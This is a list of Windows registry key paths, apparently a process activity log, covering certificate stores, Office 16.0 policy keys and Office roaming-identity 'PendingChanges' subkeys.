HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\OfficeChannelExposure
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Common\OfficeChannelExposure
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\OfficeChannelExposure
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\Knowledge
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\Placeholder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\Reset
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\2493ec62
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\2493ec62\718675225
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\2493ec62\718675225\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\2493ec62\718675225\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\2493ec62\718675225\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\2493ec62\718675225\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\2493ec62\718675225\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\32dbee8e
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\32dbee8e\708966469
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\32dbee8e\708966469\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\32dbee8e\708966469\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\32dbee8e\708966469\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\32dbee8e\708966469\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\32dbee8e\708966469\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\38cb8f49
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\38cb8f49\393178352
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\38cb8f49\393178352\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\38cb8f49\393178352\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\38cb8f49\393178352\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\38cb8f49\393178352\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\38cb8f49\393178352\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\3e866f52
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\3e866f52\-1604589325
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\3e866f52\-1604589325\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\3e866f52\-1604589325\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\3e866f52\-1604589325\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\3e866f52\-1604589325\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\3e866f52\-1604589325\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\489e7d9e
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\489e7d9e\-1896733737
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\489e7d9e\-1896733737\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\489e7d9e\-1896733737\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\489e7d9e\-1896733737\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\489e7d9e\-1896733737\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\50814ca4
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\50814ca4\-1347792945
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\50814ca4\-1347792945\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\50814ca4\-1347792945\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\50814ca4\-1347792945\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\50814ca4\-1347792945\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\50814ca4\-1347792945\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\562f8933
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\562f8933\72733301
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\562f8933\72733301\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\562f8933\72733301\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\562f8933\72733301\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\562f8933\72733301\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\562f8933\72733301\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5f2615e8
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5f2615e8\-1509960082
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5f2615e8\-1509960082\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5f2615e8\-1509960082\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5f2615e8\-1509960082\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5f2615e8\-1509960082\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5f2615e8\-1509960082\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5fd6a8ae
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5fd6a8ae\-1234042519
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5fd6a8ae\-1234042519\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5fd6a8ae\-1234042519\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5fd6a8ae\-1234042519\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5fd6a8ae\-1234042519\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5fd6a8ae\-1234042519\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\66ddb580
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\66ddb580\1202881299
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\66ddb580\1202881299\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\66ddb580\1202881299\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\66ddb580\1202881299\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\66ddb580\1202881299\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\66ddb580\1202881299\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\7560c652
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\7560c652\-2104952903
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\7560c652\-2104952903\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\7560c652\-2104952903\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\7560c652\-2104952903\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\7560c652\-2104952903\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\7560c652\-2104952903\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\813ae6b6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\813ae6b6\1439993264
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\813ae6b6\1439993264\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\813ae6b6\1439993264\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\813ae6b6\1439993264\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\813ae6b6\1439993264\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\813ae6b6\1439993264\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\842006b3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\842006b3\1931670735
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\842006b3\1931670735\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\842006b3\1931670735\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\842006b3\1931670735\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\842006b3\1931670735\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\842006b3\1931670735\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\8613774c
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\8613774c\-819544651
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\8613774c\-819544651\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\8613774c\-819544651\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\8613774c\-819544651\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\8613774c\-819544651\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\8613774c\-819544651\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9314495b
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9314495b\-1647283665
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9314495b\-1647283665\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9314495b\-1647283665\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9314495b\-1647283665\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9314495b\-1647283665\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9314495b\-1647283665\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\988a9e8
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\988a9e8\-811380121
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\988a9e8\-811380121\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\988a9e8\-811380121\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\988a9e8\-811380121\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\988a9e8\-811380121\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\988a9e8\-811380121\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9ef6541d
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9ef6541d\200742662
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9ef6541d\200742662\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9ef6541d\200742662\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9ef6541d\200742662\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9ef6541d\200742662\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9ef6541d\200742662\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\a88935c4
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\a88935c4\8365587
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\a88935c4\8365587\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\a88935c4\8365587\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\a88935c4\8365587\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\a88935c4\8365587\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\a88935c4\8365587\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\aabebc6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\aabebc6\417271860
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\aabebc6\417271860\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\aabebc6\417271860\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\aabebc6\417271860\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\aabebc6\417271860\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\aabebc6\417271860\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b3a19b73
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b3a19b73\-1511210859
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b3a19b73\-1511210859\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b3a19b73\-1511210859\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b3a19b73\-1511210859\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b3a19b73\-1511210859\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b3a19b73\-1511210859\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b7d248e0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b7d248e0\707973128
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b7d248e0\707973128\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b7d248e0\707973128\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b7d248e0\707973128\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b7d248e0\707973128\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b7d248e0\707973128\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b8b6ef7a
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b8b6ef7a\35856241
